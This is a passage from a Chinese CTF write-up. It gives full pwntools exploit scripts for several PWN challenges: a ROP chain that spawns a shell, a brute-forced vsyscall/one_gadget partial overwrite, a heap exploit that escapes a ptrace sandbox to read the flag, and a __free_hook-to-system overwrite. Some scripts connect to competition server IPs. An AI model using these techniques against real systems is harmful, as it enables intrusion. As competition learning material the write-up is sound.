    if gmpy2.iroot(c + n * k, 3)[1] == 1:
        res = gmpy2.iroot(c + n * k, 3)[0]
        print(k, res)
        print(long_to_bytes(res))
        break

PWN

protocol

静态编译栈溢出 ret2syscall即可

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
import ctf_pb2
context.log_level = 'debug'

binary = 'protocol'
elf = ELF('protocol')
libc = elf.libc
context.binary = binary
if(len(sys.argv) == 3):
    sh = remote(sys.argv[1],sys.argv[2])
else:
    sh = process(binary)
l64 = lambda      :u64(sh.recvuntil("\\x7f")[-6:].ljust(8,"\\x00"))
l32 = lambda      :u32(sh.recvuntil("\\xf7")[-4:].ljust(4,"\\x00"))
sla = lambda a,b  :sh.sendlineafter(str(a),str(b))
sa  = lambda a,b  :sh.sendafter(str(a),str(b))
lg  = lambda name,data : sh.success(name + ": 0x%x" % data)
se  = lambda payload: sh.send(payload)
rl  = lambda      : sh.recv()
sl  = lambda payload: sh.sendline(payload)
ru  = lambda a     :sh.recvuntil(str(a))
def new_ctf(username = b"admin",password = b"admin"):
    ctf = ctf_pb2.pwn()
    ctf.username = username
    ctf.password = password
    payload = ctf.SerializeToString()
    sh.sendafter(b"Login: ", payload)
def send_payload(offset,payload):
    if (payload) == 0:
        # new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x8,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x7,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x6,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x5,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x4,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x3,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x2,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x1,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a',b"c"*0x100)
    elif payload < 0xff and payload > 0:
        print("aaa")
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x7,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x6,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x5,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x4,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x3,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x2,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + p8(payload),b"c"*0x100)
        # new_ctf(b"a"*0x148 + offset*b'a',b"c"*0x100)
    elif offset == 0:
        print("bbbb")
        new_ctf(b"a"*0x148+p32(payload)[:3],b"c"*0x100)
    else:
    # new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x5,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x4,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x3,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x2,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x1,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3],b"c"*0x100)
pop_rdi = 0x0000000000404982
# 0
pop_rsi = 0x0000000000588bbe
# 0x81a2a0+0x400
pop_rdx = 0x000000000040454f
# 0x200
pop_rax = 0x00000000005bdb8a
#0
syscall = 0x000000000068f0a4
pop_rsp = 0x00000000005a350a
#0x81a2a0+0x400
# attach(sh)
send_payload(0x88,syscall)
send_payload(0x80,0x3b)
send_payload(0x78,pop_rax)
send_payload(0x70,0)
send_payload(0x68,pop_rdx)
send_payload(0x60,0)
send_payload(0x58,pop_rsi)
send_payload(0x50,0x81a2a0+0x400)
send_payload(0x48,pop_rdi)
send_payload(0x40,syscall)
send_payload(0x38,0)
send_payload(0x30,pop_rax)
send_payload(0x28,0x7)
send_payload(0x20,pop_rdx)
send_payload(0x18,0x81a2a0+0x400)
send_payload(0x10,pop_rsi)
send_payload(0x8,0)
send_payload(0,0)
send_payload(0,pop_rdi)
new_ctf()
sh.interactive()
"""
p = p64(0x0000000000588bbe) # pop rsi ; ret
p += p64(0x0000000000817b80) # @ .data
p += p64(0x00000000005bdb8a) # pop rax ; ret
p += b'/bin/sh;'
p += p64(0x00000000005b6835) # mov qword ptr [rsi], rax ; ret
p += p64(0x0000000000588bbe) # pop rsi ; ret
p += p64(0x0000000000817b88) # @ .data + 8
p += p64(0x00000000006c6a69) # xor rax, rax ; ret
p += p64(0x00000000005b6835) # mov qword ptr [rsi], rax ; ret
p += p64(0x0000000000404982) # pop rdi ; ret
p += p64(0x0000000000817b80) # @ .data
p += p64(0x0000000000588bbe) # pop rsi ; ret
p += p64(0x0000000000817b88) # @ .data + 8
p += p64(0x000000000040454f) # pop rdx ; ret
p += p64(0x0000000000817b88) # @ .data + 8
p += p64(0x00000000006c6a69) # xor rax, rax ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x0000000000403c99) # syscall
"""

unexploitable

栈溢出,利用 VSDO 填第一个返回地址,然后部分覆盖 libc 的地址(第二个返回地址)为 one_gadget,需要 1/4096 爆破

from pwn import *
#context.log_level = "debug"
context.timeout = 10

while(1):
    try:
        sh = remote('47.95.3.91', 41632)
        sh.send('a' * 0x18 + p64(0xffffffffff600400) * 2 + '\\x02\\xc3\\x4f')
        sleep(0.1)
        for i in range(3):
            sh.sendline("cat flag")
            sleep(0.1)
            # sh.interactive()
        data = sh.recv()
        print(data)
        if "flag" in data:
            break
    except Exception as e:
        print(e)
        sh.close()
sh.interactive()

sandboxheap

菜单题套个调试器实现的沙箱

void __fastcall __noreturn main(int a1, char **a2, char **a3)
{
  __pid_t v3; // eax
  unsigned int v4; // ebx
  unsigned __int64 orig_rax; // rax
  int *v6; // rax
  char *v7; // rax
  struct user_regs_struct regs; // [rsp+0h] [rbp-108h] BYREF
  unsigned __int64 v9; // [rsp+D8h] [rbp-30h]

  v9 = __readfsqword(0x28u);
  if ( a1 <= 1 )
  {
    __fprintf_chk(stderr, 1LL, "strace: too few arguments: %d", (unsigned int)a1);
  }
  else
  {
    v3 = fork();
    v4 = v3;
    if ( v3 != -1 )
    {
      if ( v3 )
      {
        waitpid(v3, 0LL, 0);
        ptrace(PTRACE_SETOPTIONS, v4, 0LL, 0x100000LL);
        do
        {
          if ( ptrace(PTRACE_SYSCALL, v4, 0LL, 0LL) == -1
            || waitpid(v4, 0LL, 0) == -1
            || ptrace(PTRACE_GETREGS, v4, 0LL, &regs) == -1 )
          {
            break;
          }
          if ( regs.orig_rax == 0x25 )          // alarm
            set_map(1);
          orig_rax = regs.orig_rax;
          if ( LODWORD(regs.orig_rax) <= 0x2710 && regs_map[SLODWORD(regs.orig_rax)] )
          {
            regs.orig_rax = -1LL;
            if ( ptrace(PTRACE_SETREGS, v4, 0LL, &regs) == -1 )
              break;
            orig_rax = regs.orig_rax;
          }
          switch ( orig_rax )
          {
            case 0xE7uLL:
              goto LABEL_24;
            case 0x2710uLL:
              set_map(regs.rdi);
              break;
            case 0x3CuLL:
LABEL_24:
              exit(regs.rdi);
          }
        }
        while ( ptrace(PTRACE_SYSCALL, v4, 0LL, 0LL) != -1
             && waitpid(v4, 0LL, 0) != -1
             && (regs.orig_rax != 10000 && regs.orig_rax != -1LL || ptrace(PTRACE_POKEUSER, v4, 0x50LL) != -1) );
      }
      else
      {
        ptrace(PTRACE_TRACEME, 0LL, 0LL, 0LL);
        execvp(a2[1], a2 + 1);
      }
    }
    v6 = __errno_location();
    v7 = strerror(*v6);
    __fprintf_chk(stderr, 1LL, "strace: %s", v7);
  }
  fputc(10, stderr);
  exit(1);
}

set_map 设置一个 syscall_allow 数组

void __fastcall set_map(char a1)
{
  memset(regs_map, 1, 0x2711uLL);
  regs_map[3] = 0;                              // sys_close   
  *(_DWORD *)&regs_map[9] = 0;                  // sys_mmap
  regs_map[60] = 0;                             // sys_exit    
  regs_map[231] = 0;                            // sys_exit_group  
  if ( (a1 & 1) != 0 )
  {
    regs_map[40] = 0;                           // sys_sendfile64  
    *(_WORD *)regs_map = 0;                     // sys_read, sys_write
    *(_DWORD *)&regs_map[17] = 0;               // sys_pread64, sys_pwrite64, sys_readv, sys_writev
    *(_WORD *)&regs_map[295] = 0;               // sys_preadv, sys_pwritev
    byte_204750 = 0;
  }
  if ( (a1 & 2) != 0 )
    regs_map[2] = 0;                            // sys_open
}

堆菜单用 ROP 调用 0x2710 使得调用打开,然后 ORW 就行了,堆菜单做法看 *bitheap* 这题

from pwn import *

context.log_level = "debug"
context.arch = "amd64"
#sh = process(['./sandbox', './sandboxheap'])
sh = remote('39.106.13.71', 15670)
#sh = process(['./sandboxheap'])

def choice(idx):
    sh.sendlineafter("choice: ", str(idx))

def add(idx, size):
    choice(1)
    sh.sendlineafter("Index: ", str(idx))
    sh.sendlineafter("Size: ", str(size))

def edit(idx, content, tag=False):
    choice(2)
    sh.sendlineafter("Index: ", str(idx))

    send_content = ""
    for i in content:
        send_content += bin(u8(i))[2:].rjust(8, '0')[::-1]
    if tag:
        send_content += '0'
    sh.sendafter("Content: ", send_content)

def show(idx):
    choice(3)
    sh.sendlineafter("Index: ", str(idx))

def delete(idx):
    choice(4)
    sh.sendlineafter("Index: ", str(idx))

add(0, 0x88)
add(1, 0x88)

for i in range(2, 2 + 7):
    add(i, 0x88)

delete(0)
delete(1)
add(1, 0x88)
add(0, 0x88)
show(1)
heap_base = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x260
log.success("heap_base:\\t" + hex(heap_base))

fake_chunk = heap_base + 0x2e0
fake_ptr = fake_chunk + 0x20
fd = fake_ptr - 0x18
bk = fake_ptr - 0x10
chunk_data = p64(fd) + p64(bk) + p64(fake_chunk)
chunk_data = chunk_data.ljust(0x80, '\\x00') + p64(0x90)
edit(1, chunk_data, True)
for i in range(2, 2 + 7):
    delete(i)

delete(0)

for i in range(2, 2 + 7):
    add(i, 0x88)

add(0, 0x88)
show(1)
libc_base = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x3ebca0
log.success("libc_base:\\t" + hex(libc_base))

pop_rdi_addr = libc_base + 0x2164f
pop_rsi_addr = libc_base + 0x23a6a
pop_rdx_addr = libc_base + 0x1b96
pop_rax_addr = libc_base + 0x1b500
syscall_addr = libc_base + 0xd2625
free_hook_addr = libc_base + 0x3ed8e8
environ = libc_base + 0x3ee098
gets_addr = libc_base + 0x80060

add(9, 0x88)
delete(0)
delete(9)
edit(1, p64(environ))
add(9, 0x88)
add(0, 0x88)
show(0)
stack = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x110
log.success("stack:\\t" + hex(stack))

delete(2)
delete(9)
edit(1, p64(stack - 0x18))

add(9, 0x88)
add(2, 0x88)

start_addr = stack - 0x18
rop_chain1 = flat([
    pop_rdi_addr,
    0,
    pop_rsi_addr,
    stack,
    pop_rdx_addr,
    0x200,
    syscall_addr,
])

rop_chain2 = flat([
    pop_rdi_addr,
    3,
    pop_rax_addr,
    0x2710,
    syscall_addr,

    pop_rdi_addr,
    start_addr,
    pop_rsi_addr,
    0,
    pop_rax_addr,  # sys_open('flag', 0)
    2,
    syscall_addr,
    pop_rax_addr,  # sys_read(flag_fd, heap, 0x100)
    0,
    pop_rdi_addr,
    3,
    pop_rsi_addr,
    start_addr + 0x200,
    pop_rdx_addr,
    0x100,
    syscall_addr,
    pop_rax_addr,  # sys_write(1, heap, 0x100)
    1,
    pop_rdi_addr,
    1,
    pop_rsi_addr,
    start_addr + 0x200,
    syscall_addr
])

#gdb.attach(sh, "b *$rebase(0x0000000000000E63)")
edit(2, 'flag'.ljust(0x18, '\\x00') + rop_chain1)
sh.sendline(p64(pop_rdi_addr + 1) * 0x10 + rop_chain2)

sh.interactive()

queue

666 为后门位置,可以通过这个来控制 queue 结构体,借此 leak libc 和修改 __free_hook 即可

from pwn import *

context.log_level = "debug"
#sh = process('./queue')
sh = remote('101.201.71.136', 12507)

def choice(idx):
    sh.sendlineafter("Queue Management: ", str(idx))

def push(size):
    choice(1)
    sh.sendlineafter("Size: ", str(size))

def change(idx, value_idx, value):
    choice(2)
    sh.sendlineafter("Index: ", str(idx))
    sh.sendlineafter("Value idx: ", str(value_idx))
    sh.sendlineafter("Value: ", str(value))

def show(idx, num):
    choice(3)
    sh.sendlineafter("Index: ", str(idx))
    sh.sendlineafter("Num: ", str(num))

def pop():
    choice(4)

def delete(idx):
    choice(4)
    sh.sendlineafter("Index: ", str(idx))

def edit(idx, offset, data):
    for x in data:
        change(idx, offset, ord(x))
        offset += 1

def backdoor(idx, content):
    choice(666)
    sh.sendlineafter("Index: ", str(idx))
    sh.sendafter("Content: ", content)

def get_show(size):
    data = ""
    sh.recvuntil('Content: ')
    for i in range(size):
        data += chr(int(sh.recvline(), 16))
    return data

push(0x100)  # 0
push(0x100)  # 1
edit(0, 0, '/bin/sh')
# edit(1, 0, 'b' * 0x100)
pop()

backdoor(0, 'a' * 8 + p64(0x1000) + '\\x00')
show(0, 0xc0)
leak_data = get_show(0xc0)

log.hexdump(leak_data)

heap_base = u64(leak_data[-8:]) - 0x126f0
log.success("heap_base:\\t" + hex(heap_base))
backdoor(0, p64(heap_base + 0x126a0) + p64(0x8) + '\\xf0')
push(0x100) #1
push(0x100) #2
push(0x100) #3
push(0x100) #4
pop() #4
pop() #3
pop() #2
pop() #1

fake_struct = p64(heap_base + 0x131a0) + p64(0x8)
fake_struct += p64(heap_base + 0x13450) + p64(heap_base + 0x13450)
fake_struct += p64(heap_base + 0x13450 + 0x200) + p64(heap_base + 0x131b8)
fake_struct += p64(heap_base + 0x13450 + 0x100) + p64(heap_base + 0x13450)
backdoor(0, fake_struct)

show(0, 0x10)
libc_leak = get_show(0x10)
log.hexdump(libc_leak)
libc_base = u64(libc_leak[-8:]) - 0x3ebca0
log.success("libc_base:\\t" + hex(libc_base))

free_hook_addr = libc_base + 0x3ed8e8
system_addr = libc_base + 0x4f420
bin_sh_addr = libc_base + 0x1b3d88

fake_struct2 = p64(heap_base + 0x131a0) + p64(0x8)
fake_struct2 += p64(free_hook_addr) + p64(free_hook_addr)
fake_struct2 += p64(free_hook_addr + 0x200) + p64(heap_base + 0x131b8)
fake_struct2 += p64(free_hook_addr + 0x100) + p64(free_hook_addr)
backdoor(0, fake_struct2)

edit(0, 0, p64(system_addr))
#gdb.attach(sh, "b free")
pop()

sh.interactive()

ojs

根据字符串内容找到项目地址:https://github.com/ndreynolds/flathead

编译一份源码,然后用 gdb dprintf 来调试程序,输出所有的 prop ,然后编写程序进行比对

a = '''prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:create
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:defineProperty
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:defineProperties
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getOwnPropertyDescriptor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:keys
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getOwnPropertyNames
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getPrototypeOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:preventExtensions
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isExtensible
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:seal
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isSealed
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:freeze
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isFrozen
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:hasOwnProperty
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isPrototypeOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:propertyIsEnumerable
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Object
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:prototype
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:apply
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:bind
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:call
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isGenerator
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:Function
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isArray
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:pop
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:push
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:reverse
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:shift
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sort
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:splice
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:unshift
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:concat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:join
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:slice
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:indexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:lastIndexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:filter
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:forEach
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:every
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:map
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:some
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:reduce
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:reduceRight
prop:Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:fromCharCode
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:charTo
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:charAt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:charCodeAt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:concat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:indexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:lastIndexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:localeCompare
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:match
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:replace
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:search
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:slice
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:split
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:substr
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:substring
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleLowerCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleUpperCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLowerCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toUpperCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:trim
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:trimLeft
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:trimRight
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:String
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:MAX_VALUE
prop:MIN_VALUE
prop:NEGATIVE_INFINITY
prop:POSITIVE_INFINITY
prop:NaN
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toExponential
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toFixed
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toPrecision
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Number
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Boolean
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:now
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parse
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:UTC
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isDST
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getDay
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getTime
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getTimezoneOffset
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCDay
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
